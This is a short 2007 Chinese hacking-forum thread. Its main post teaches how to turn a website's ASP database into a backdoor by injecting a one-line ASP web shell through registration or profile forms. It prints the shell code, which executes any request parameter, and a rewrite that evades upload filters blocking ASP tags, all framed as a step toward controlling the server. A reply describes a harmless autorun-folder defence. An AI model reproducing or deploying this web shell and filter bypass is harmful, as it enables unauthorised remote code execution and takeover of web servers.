林海谐缘

 找回密码
 审核注册
搜索
查看: 1365|回复: 1

一句话木马中突破〈%%〉标记过滤

[复制链接]
发表于 2007-7-3 10:07:38 | 显示全部楼层 |阅读模式
1。突破〈%%〉标记过滤
很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
原来的程序代码是“〈%execute request("l")%>", 我们可以把它的标签换下来,改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".这样就避开了使用〈%%〉,保存为.ASP,程序照样执行。效果是一样的
发表于 2007-7-3 12:23:50 | 显示全部楼层
为了防护攻击,而自己做个假的,很多软件也是用的这种方法。
费儿试验的那个防止病毒再生的工具就是这样在根目录放个AUTORUN。INF文件夹 [s:24]
您需要登录后才可以回帖 登录 | 审核注册

本版积分规则

QQ|手机版|小黑屋|林海谐缘论坛 ( 豫ICP备07015145号 ) |
拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论 | 管理员:linker(QQ:80555546) 群:3067918

GMT+8, 2024-11-21 23:21 , Processed in 0.026551 second(s), 14 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表